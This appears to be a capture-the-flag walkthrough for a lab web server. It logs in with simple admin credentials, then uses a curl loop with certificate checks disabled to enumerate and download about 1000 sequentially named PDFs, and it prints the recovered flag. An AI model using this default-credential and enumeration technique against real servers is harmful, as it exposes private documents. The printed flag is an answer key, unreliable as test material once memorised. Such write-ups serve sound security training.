You have found a webserver with login prompt at https://10.XX.32.95:1002. Try to find the flag.
Can you find login credentials and retrieve the flag that is hidden in one of the PDF files?
The webpage asks for credentials.
Providing a simple admin
credential pair allows to log in.
Website provides a list of ~1000 documents (screenshot contains only two) to download.
Look at HTML source to write a script for document download.
<center><h3>Welcome to top secret document storage</h3></center><br><br>
Do not share this confidential file without a permission: <a href="uploads/secret_document1.pdf"><img src="pdf.png" height=20>download file</a><br><hr><br>
Do not share this confidential file without a permission: <a href="uploads/secret_document2.pdf"><img src="pdf.png" height=20>download file</a><br><hr><br>
Download all documents and convert to text with pdftotext
. Flag is revealed in secret_document222.pdf
$ for i in $(seq 1 1000); do echo -n "$i: "; curl -sk https://10.XX.32.95:1002/uploads/secret_document$i.pdf -o - | pdftotext - - | xargs; done
1: 404 Flag not found.
2: 404 Flag not found.
3: 404 Flag not found.
220: 404 Flag not found.
221: 404 Flag not found.
222: 5a3120aef7d098ea27a3c5de177b2602
223: 404 Flag not found.
224: 404 Flag not found.